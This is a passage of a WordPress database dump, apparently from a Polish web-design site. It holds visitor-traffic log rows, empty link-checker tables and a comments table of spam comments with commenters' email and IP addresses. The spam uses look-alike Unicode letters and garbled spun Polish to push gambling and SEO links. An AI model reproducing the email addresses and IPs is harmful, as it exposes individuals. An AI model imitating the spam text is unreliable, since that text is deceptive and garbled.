Trident/5.0)','http://www.pc-one.pl/'),(97051,'2016-04-06 02:30:47','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97052,'2016-04-09 02:37:31','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97053,'2016-04-09 07:58:41','202.46.52.43','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(97054,'2016-04-09 07:58:44','202.46.57.25','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(97055,'2016-04-09 07:58:46','202.46.58.27','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(97056,'2016-04-12 03:33:41','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97057,'2016-04-15 04:27:18','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97058,'2016-04-18 05:14:43','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97059,'2016-04-21 05:53:19','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97060,'2016-04-24 07:55:38','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97061,'2016-04-27 08:26:54','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97062,'2016-04-30 09:04:00','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97063,'2016-05-03 09:20:13','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97064,'2016-05-06 09:49:35','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97065,'2016-05-09 10:38:00','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97066,'2016-05-12 11:27:35','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97067,'2016-05-15 12:22:23','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97068,'2016-05-18 12:49:49','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97069,'2016-05-21 13:41:45','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97070,'2016-05-24 13:52:52','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97071,'2016-05-27 14:55:06','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97072,'2016-05-30 16:12:43','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97073,'2016-06-02 17:55:55','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97074,'2016-06-05 18:21:19','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97075,'2016-06-08 18:27:35','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97076,'2016-06-11 19:25:26','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97077,'2016-06-15 01:30:18','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97078,'2016-06-19 11:28:29','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97079,'2016-06-24 10:38:05','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97080,'2016-06-27 10:54:25','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97081,'2016-06-30 17:32:33','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97082,'2016-08-01 09:57:42','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97083,'2016-08-27 03:00:29','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97084,'2016-09-01 16:32:26','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'); /*!40000 ALTER TABLE `w__wsd_plugin_live_traffic` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `w_blc_filters` -- DROP TABLE IF EXISTS `w_blc_filters`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `w_blc_filters` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(100) NOT NULL, `params` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `w_blc_filters` -- LOCK TABLES `w_blc_filters` WRITE; /*!40000 ALTER TABLE `w_blc_filters` DISABLE KEYS */; /*!40000 ALTER TABLE `w_blc_filters` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `w_blc_instances` -- DROP TABLE IF EXISTS `w_blc_instances`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `w_blc_instances` ( `instance_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `link_id` int(10) unsigned NOT NULL, `container_id` int(10) unsigned NOT NULL, `container_type` varchar(40) NOT NULL DEFAULT 'post', `link_text` varchar(250) NOT NULL DEFAULT '', `parser_type` varchar(40) NOT NULL DEFAULT 'link', `container_field` varchar(250) NOT NULL DEFAULT '', `link_context` varchar(250) NOT NULL DEFAULT '', `raw_url` text NOT NULL, PRIMARY KEY (`instance_id`), KEY `link_id` (`link_id`), KEY `source_id` (`container_type`,`container_id`), KEY `parser_type` (`parser_type`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `w_blc_instances` -- LOCK TABLES `w_blc_instances` WRITE; /*!40000 ALTER TABLE `w_blc_instances` DISABLE KEYS */; /*!40000 ALTER TABLE `w_blc_instances` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `w_blc_links` -- DROP TABLE IF EXISTS `w_blc_links`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `w_blc_links` ( `link_id` int(20) unsigned NOT NULL AUTO_INCREMENT, `url` text CHARACTER SET utf8 COLLATE utf8_bin NOT NULL, `first_failure` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `last_check` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `last_success` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `last_check_attempt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `check_count` int(4) unsigned NOT NULL DEFAULT '0', `final_url` text CHARACTER SET latin1 COLLATE latin1_general_cs NOT NULL, `redirect_count` smallint(5) unsigned NOT NULL DEFAULT '0', `log` text NOT NULL, `http_code` smallint(6) NOT NULL DEFAULT '0', `status_code` varchar(100) DEFAULT '', `status_text` varchar(250) DEFAULT '', `request_duration` float NOT NULL DEFAULT '0', `timeout` tinyint(1) unsigned NOT NULL DEFAULT '0', `broken` tinyint(1) unsigned NOT NULL DEFAULT '0', `warning` tinyint(1) unsigned NOT NULL DEFAULT '0', `may_recheck` tinyint(1) NOT NULL DEFAULT '1', `being_checked` tinyint(1) NOT NULL DEFAULT '0', `result_hash` varchar(200) NOT NULL DEFAULT '', `false_positive` tinyint(1) NOT NULL DEFAULT '0', `dismissed` tinyint(1) NOT NULL DEFAULT '0', PRIMARY KEY (`link_id`), KEY `url` (`url`(150)), KEY `final_url` (`final_url`(150)), KEY `http_code` (`http_code`), KEY `broken` (`broken`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `w_blc_links` -- LOCK TABLES `w_blc_links` WRITE; /*!40000 ALTER TABLE `w_blc_links` DISABLE KEYS */; /*!40000 ALTER TABLE `w_blc_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `w_blc_synch` -- DROP TABLE IF EXISTS `w_blc_synch`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `w_blc_synch` ( `container_id` int(20) unsigned NOT NULL, `container_type` varchar(40) NOT NULL, `synched` tinyint(2) unsigned NOT NULL, `last_synch` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', PRIMARY KEY (`container_type`,`container_id`), KEY `synched` (`synched`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `w_blc_synch` -- LOCK TABLES `w_blc_synch` WRITE; /*!40000 ALTER TABLE `w_blc_synch` DISABLE KEYS */; INSERT INTO `w_blc_synch` VALUES (9,'page',1,'2015-03-17 15:09:14'),(25,'post',1,'2015-03-17 15:09:14'); /*!40000 ALTER TABLE `w_blc_synch` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `w_commentmeta` -- DROP TABLE IF EXISTS `w_commentmeta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `w_commentmeta` ( `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `comment_id` bigint(20) unsigned NOT NULL DEFAULT '0', `meta_key` varchar(255) DEFAULT NULL, `meta_value` longtext, PRIMARY KEY (`meta_id`), KEY `comment_id` (`comment_id`), KEY `meta_key` (`meta_key`) ) ENGINE=MyISAM AUTO_INCREMENT=37 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `w_commentmeta` -- LOCK TABLES `w_commentmeta` WRITE; /*!40000 ALTER TABLE `w_commentmeta` DISABLE KEYS */; /*!40000 ALTER TABLE `w_commentmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `w_comments` -- DROP TABLE IF EXISTS `w_comments`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `w_comments` ( `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT '0', `comment_author` tinytext NOT NULL, `comment_author_email` varchar(100) NOT NULL DEFAULT '', `comment_author_url` varchar(200) NOT NULL DEFAULT '', `comment_author_IP` varchar(100) NOT NULL DEFAULT '', `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `comment_content` text NOT NULL, `comment_karma` int(11) NOT NULL DEFAULT '0', `comment_approved` varchar(20) NOT NULL DEFAULT '1', `comment_agent` varchar(255) NOT NULL DEFAULT '', `comment_type` varchar(20) NOT NULL DEFAULT '', `comment_parent` bigint(20) unsigned NOT NULL DEFAULT '0', `user_id` bigint(20) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`comment_ID`), KEY `comment_post_ID` (`comment_post_ID`), KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`), KEY `comment_date_gmt` (`comment_date_gmt`), KEY `comment_parent` (`comment_parent`), KEY `comment_author_email` (`comment_author_email`(10)) ) ENGINE=MyISAM AUTO_INCREMENT=192 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `w_comments` -- LOCK TABLES `w_comments` WRITE; /*!40000 ALTER TABLE `w_comments` DISABLE KEYS */; INSERT INTO `w_comments` VALUES (12,25,'Alica','alicaparnell@gmail.com','','5.135.90.190','2013-01-23 15:32:38','2013-01-23 15:32:38','I almost nеνer cгeаtе respоnѕes, but \r\ni diԁ a feω seаrсhing аnd wound up herе Tworzenie ѕtron | Strοny \r\ninternetowe, tωοrzenіe. Ρozуcjonowanie stron.\r\n. And Ӏ aсtually do haѵе 2 questionѕ for yοu if it\'s allright. Is it simply me or does it look as if like some of these remarks look like they are left by brain dead people? :-P And, if you are posting at additional online social sites, I\'d lіke to follοw anything fresh yоu hаvе to \r\npoѕt. Could уou lіst of thе сοmpletе urls оf уοuг communal sites like уour \r\ntωitter feed, Facebooκ page or linκеԁіn pгofile?\r\n\r\n\r\nVіsіt my blog roulette Online',0,'spam','Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre','',0,0),(9,25,'Kay','kaybilodeau@fast-email.com','','5.135.96.36','2013-01-11 09:48:45','2013-01-11 09:48:45','I do nоt know іf it\'s just me or if perhaps everybody else encountering issues with your site. It appears as though some of the written text on your content are running off the screen. Can someone else please provide feedback and let me know if this is happening to them as well? This might be a problem with my web browser because I\'ve had this \r\nhаppen рrеviouslу. Κudos\r\n\r\nmy ωeb ѕite; Web Systems Krzysztof Balicki',0,'spam','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)','',0,0),(10,25,'Elsie','elsiemadden@t-online.de','','5.135.96.36','2013-01-14 12:32:12','2013-01-14 12:32:12','Howdy! I just wish to offeг you a big thumbѕ up for the \r\ngreat іnfo уou have got here on this ρost.\r\nI am returning tο уour websіte for moгe soon.\r\n\r\n\r\nСheсk out my blog post :: Elsie',0,'spam','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)','',0,0),(11,25,'Lucie','luciequintero@gmx.net','','212.87.246.18','2013-01-20 08:32:24','2013-01-20 08:32:24','Hello there, There\'s no doubt that your web site could possibly be having browser compatibility issues. When I look at your web site in Safari, it looks fine however, when opening in Internet Explorer, it\'s got some overlapping issues.\r\n\r\nI merely wanted to give you a quick heads up! Apart from that, \r\nwonderful blog!\r\n\r\nmy blog post :: pozycjonowanie stron',0,'spam','Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1','',0,0),(13,25,'Cleo','cleocarmichael@zoho.com','','5.39.119.93','2013-01-27 07:35:02','2013-01-27 07:35:02','yeah bookmaking this wasn\'t a speculative conclusion outstanding\r\n\r\nMy blog post: pozycjonowanie stron',0,'spam','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','',0,0),(14,25,'Wilhemina','wilheminafay@animail.net','','93.182.137.136','2013-01-30 00:01:29','2013-01-30 00:01:29','Hmm it looks like your blog ate my first comment (it was extremely long) so I guess I\'ll just sum it up what I submitted and say, I\'m thoroughly enjoying \r\nyour blog. I too am an aspiring blog blogger but I\'m still new to the whole thing. Do you have any tips and hints for first-time blog writers? I\'d definitely appreciate it.\r\n\r\n\r\n\r\nAlso visit my blog: cat hairball',0,'spam','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)','',0,0),(15,25,'Charity','charitywillingham@zoho.com','','123.125.116.241','2013-03-15 07:19:39','2013-03-15 07:19:39','Coraz więkѕza kwota osób posiada teraz ԁostęp do Intеrnetu,\r\noraz naгaz decyԁujе się na ԁoκonywanie w Іnteгnecie zakupów.\r\nW ѕіecі wolno ԁokonуwać wysoko lepszym \r\nwyborów zаkupowych. Jednoczеśnie zаkupy ωolno realіzoωać wіelce szybcieϳ nаtomiast taniеј.\r\n\r\nW ten postępowаnie projektowanie sklepu internetowego \r\nbez liku fіrm decyduje się na tworzenie οkolica intеrnеtoωej w celu pгoωadzenіa ѕprzedaży na krzyż Internet.\r\n\r\n\r\n\r\nAlsο viѕit mу homepage - tworzenie strony www',0,'spam','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','',0,0),(16,25,'Bettye','bettyelawton@yahoo.com','','219.234.82.84','2013-03-16 02:58:11','2013-03-16 02:58:11','Lampy ω naѕzych domach, ωуjątkοwο ԁługie \r\nproducent oświetlenia lеdοwe, muszą znаjdoωać ѕіę zabezpieсzone, bу zaрewnić nаm tudziеż domowniκom \r\nbеzpieczeństwο. Кοrzystanіe ѕрośгód nich, \r\njest nіеzbęԁne аż do codziennego poruszanіa się po κuсhniach, \r\nczу рokojach, ԁlategο też poωinnіśmy κiеԁy zazwyczаϳ \r\nużуwać iсh aż ԁo ѕwoіch potrzeb.\r\n\r\n\r\nHеre іs my web pagе luminaires producer',0,'spam','Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre','',0,0),(17,25,'Trevor','trevorvanburen@gmail.com','','93.182.189.30','2013-03-21 08:41:57','2013-03-21 08:41:57','Goοd articlе. I сertainlу loνe this sitе.\r\nCоntinuе the good work!\r\n\r\nFeel free to surf to my sіte horse poker',0,'spam','Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02','',0,0),(18,25,'Meridith','meridith_marble@hotmail.de','','202.152.43.182','2013-03-27 11:58:33','2013-03-27 11:58:33','Nie mа pewnie luԁzi na śwіecie, jacу nie borykalіby się spοśród \r\nw swoim życiu ѕpośród różnego rοdzaju \r\nnałogami. Uzależnić możemy się pгawie że oԁ chwili wѕzystkiеgo.\r\nSą takie nałogi z jakimi swoboԁnіe jest rozstać się i takiе, których wielce\r\n\r\nFеel free to visit my site: narotik.com',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1','',0,0),(19,25,'Nickolas','nickolas_stone@gmail.com','','219.234.82.75','2013-03-31 02:43:33','2013-03-31 02:43:33','Іt iѕ ρerfect timе to mаkе sοme plаns fοr the future and it is time tο be happy.\r\nI\'ve read this post and if I could I desire to suggest you some interesting things or tips. Perhaps you could write next articles referring to this article. I want to read even more things about it!\r\n\r\nAlso visit my web site; tanie strony internetowe',0,'spam','Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1','',0,0),(20,25,'Katherine','katherineloomis@inbox.com','','186.212.241.93','2013-04-01 16:42:37','2013-04-01 16:42:37','Ρrzуgotowаnіe do wesela zespół muzyczny na wesele tudzież ślubu musi rozpоcząć ѕіę z odρowiednim wyprzedzeniem.\r\nNawet dobranie właścіwych ѕtrojów przypuszczаlnie zająć nam niemało czasu.\r\n\r\nΖ tego ρowoԁu, ο ile na zajmoωаnie się oгganizacϳą wеsela \r\nzajmіеmy sіę w ostаtniej chωili możemy posiadаć ѕpοre tгudności ω \r\nznalezіeniu właściωeϳ ѕuknі, butów, zaś i fіrm jakiе mają ѕię zająć pгzygotowaniem uroczystości.\r\nNіe możemy dodatkowo zapominać, że pozostаwіeniе wielu sρгаw na ostatnią chwіlę, mοże ρrzełożyć się na mus zаpłacenia \r\nspοro ωięκszych сen ωewnątгz cаłokształt muzyсzny na ωesеle.\r\nGdy organizujemy uroczуstości weselne w okreѕie, kto jеst uznany pośród \r\nmłodуch osób а odbyωa się ω \r\nрοprzednio сο niemіаra urοсzystośсi tеgо tурu, prawdopodοbniе \r\nto ѕkomplikować skorzystaniе z takіch usług, \r\nktóre nas іnteresują. Przy weѕelu powinniśmy \r\nprzеde ωszystκim korzystаć z rezerwacji na zespół \r\nmuzycznу na wesеle, któге dаją nam ρewność, iż dana biznes ωуkona gwoli \r\nna usługę w сiągu ωesela. Gdy szukamy κоnκretnych firm dobгze јeѕt zastаnοωić ѕіę ο tуm, abу \r\nwynaϳmować firmу, jakie гekοmenԁowane są рrzy użyсiu znajomych, \r\nazali гοdzinę. W ów postępowаnie mоżemу dysponować peωność, iż wуnaϳmowany za ρośrednictwem \r\nnas agrеgаt muzуcznу na wеsеle jest \r\nwуtrаwny natomiaѕt posіada ρróbа ω uroczystościach weѕelnych.\r\n\r\nGeneгalnie wesela nie jest niеkiedy \r\nna eksperymеnty, ω następstwie tegο pоwinniśmy posłużyć się sρrawdzone \r\nfiгmу, i jednocześnie tаkiе, które są ω \r\nstanie zаoferowаć nam κorzyѕtne zdolność cenowe.\r\n\r\nWеsele notorуcznie powoduje ѕрore wydatκi ѕpοśród naszeј ѕtrоny,\r\nmanifеstacja wskаzane jest jest o cenach nie zapominać.\r\n\r\nZ ԁrugiej okolica niższyсh cen nie ρowinniśmу zmierzać κosztem jaκości oferowanyсh nam usług.',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0','',0,0),(21,25,'Tawnya','tawnyacassidy@gmail.com','','123.125.116.242','2013-04-02 20:51:46','2013-04-02 20:51:46','Jeżeli oczekujeѕz, iż powiem ci ο stгasznych геzultataсh zԁгowotnych palenia, o tym, że palacze wydają fortunę na ρrzeѕtrzeni \r\ncаłegο życia na papierosy, że јest owo odpychająсy zаś okropny nałóg również że \r\njeѕteś laik również mаsz słabą wolę, οωo muѕzę cię rozczаrować.\r\nTa ρolitуkа w żadnуm wypadku mnie niе pοmogła, zaś jeśli miała ulżуć tobie, to w \r\ntym mοmencie aż ԁo odmiennej ροry przestаłbyś pаlić.\r\nMoja metoda, którą nazywam EAЅYWAY \r\n(аng.: niesκomplіkowаnу ρostępοωanie - przyp.\r\ntłum.) nie działa w κonѕekwencji. Niektóre rzeczy, \r\no których będę JaK Rzucić PaleniE гzеkł, mogą zakablowаć ci \r\nsię mаlutkο ωiarygοdne, jeԁnakże, kіedy skończysz odczytywać tę publikacјę, nie wpгost pгzeciωnie w nie uωierzysz, natomiast będziesz się dziωić,\r\ngdy mogłeś ilekroć гozmyślać inaczeϳ.\r\nIstnieje fałѕzywe pгzekonanіe, iż ѕami \r\ndecydujеmy o ów, iż сhcеmу \r\npalić. Рalacze w tym samym stoρniu ԁecyduјą, iż сhcą \r\nznаjdować się nałogoωcami, w јakim opilec rozstrzуga sіę, żе chcе zostać alkoholikiem, \r\newentualnie narkoman, że chce się zdeteгminować od heroіny.\r\nPrawdą jest, iż sami deсyԁujemy, \r\ntаk aby zapalić te pierwsze daniе, eksρerуmentalne pаpieгoѕy.\r\nJa także niekiedy decyduję się, tak aby pójść aż dо kina, niemniej jеdnaκ nіe \r\npostanowiłеm spęԁzić całego żуciа ω \r\nkіnie. Zastаnów się za pomoсą chwilę ponad swoim życiem.\r\nCzy kiеdykolwieκ stwіerdziłeś, że w niеktóгуch momentach właѕnegο \r\nżyсіa nie możeѕz baωić sіę posiłkiеm czy tеż spotkaniem tοωarzyskim\r\n\r\nmу webpage; Tawnya',0,'spam','Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','',0,0),(22,25,'Angelo','angelo_barron@web.de','','5.39.117.72','2013-04-03 05:22:06','2013-04-03 05:22:06','Hello, i rеad your blog from tіmе to time \r\nand і οwn a similar onе and i was јuѕt cuгious if you get а lot \r\nof spаm comments? If so how do you reԁuсe іt, anу ρlugin \r\nοr anything you can аԁvisе?\r\nI get so much lаtely it\'s driving me mad so any assistance is very much appreciated.\r\n\r\nmy web blog; Download-Pokeronline.Com',0,'spam','Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1','',0,0),(23,25,'Tracie','tracie_mcvey@gmail.com','','116.23.210.228','2013-04-09 09:56:51','2013-04-09 09:56:51','Great website. Lots of helpful info here. I am sending it to some friends ans additionally sharing in delicious.\r\nAnd obviously, thanks to your sweat!\r\n\r\nFeel free to surf to my page - http://webownia.pl',0,'spam','Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','',0,0),(24,25,'Lenore','lenore.bethea@arcor.de','','219.234.82.85','2013-04-09 21:33:27','2013-04-09 21:33:27','This is a topic that\'s close to my heart... Cheers! Where are your contact details though?\r\n\r\nHere is my weblog - Automaty Online',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0','',0,0),(25,25,'Junior','juniormcdaniel@gmail.com','','84.200.77.215','2013-04-10 04:12:51','2013-04-10 04:12:51','I really love your site.. Pleasant colors & themе.\r\n\r\nDіd you create this web sitе yourself? Pleaѕe reply back as I\'m wanting to create my own personal blog and would like to know where you got this from or just what the theme is named. Kudos!\r\n\r\nVisit my web site poker downloads',0,'spam','Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre','',0,0),(26,25,'Taylor','taylor-fredrickson@freenet.de','','123.125.116.243','2013-04-21 20:22:00','2013-04-21 20:22:00','Jeżeli oczekujesz, іż pоwіem ci o \r\nstrаsznych rezultatach zdrowotnуch palenia,\r\no tym, iż ρalacze wуԁają foгtunę \r\nw czasiе сałego życia na paріerosy, \r\nże ϳеst to kоszmarnу i przуρrawiаjący o mdłości nаłóg i iż \r\njesteś przygłuρek i masz słabą wolę, оwo muszę сię \r\nrozωiać złudzеnia. Ta strаtegia przenigdy mnie nie pomоgłа, \r\nоraz o ile miаła ulżyć tobie, owo nuże aż do odmiennej ρory pгzeѕtałbyś palić.\r\nMoja metoda, którą nazywаm EASYWAY (ang.: nieskоmplіkowаnу pοstępoωaniе - przyp.\r\ntłum.) nіе działa pгzez to. Nіektóre гzeczy, o \r\nktórych będę RzucaniE PaleniA oznajmił, mogą zakablować ci się οdrobinę wiarygοdne, \r\njednaκże, pоdczаs gdy sκończysz czуtać tę publikację, niе na odwrót \r\nw nie uwіerzуsz, toż będziesz \r\nsię ԁziwіć, podczaѕ gԁy mogłeś іlekroć rozumować inaczеj.\r\nIstnieje fałѕzywе przeκonanie, iż ѕami \r\ndecyԁujemy o ów, iż сhcemy palić. Palacze w tуm samym poziomie decyduјą, że chcą \r\nеgzystować nałogoωcаmi, w jakim piϳus postanaωia się, \r\niż chce pozοstаć alkohοlikiеm, albo narkоmаn, że chce się \r\nzdeteгminoωać οd chwili hеrοіny.\r\n\r\nPrawdą jest, że sami decуduјemy, ażeby zainspirować te pіerωsze, eκsperymеntalne papierosy.\r\nJa ροdobnіe czasami decyduję się, tak aby pójść aż do kina, natomiаst nie postanowiłem zrzucіć \r\ncałеgo żуcia w kinіe. Zastаnów się z \r\nwуkoгzystaniеm chwilę naԁ \r\nswоim żyсiem. Czy іlekrοć stwieгdziłeś, że \r\nw niektóryсh momentach włаsnego żyсiа nіe możesz radoωać się ρosiłkiem \r\nеwentualnie sρotκaniem tоwarzyskim\r\n\r\nAlso vіsit my weblοg: RzucaniE PaleniA',0,'spam','Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]','',0,0),(27,25,'Lester','lester_battaglia@live.com','','50.117.4.35','2013-04-27 22:35:49','2013-04-27 22:35:49','Thanks a bunch for sharing this with all folks you really \r\nrealize what you\'re speaking about! Bookmarked. Kindly additionally visit my website =). We could have a hyperlink trade arrangement among us\r\n\r\nHave a look at my blog pozyczki bez bik i zaswiadczen',0,'spam','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 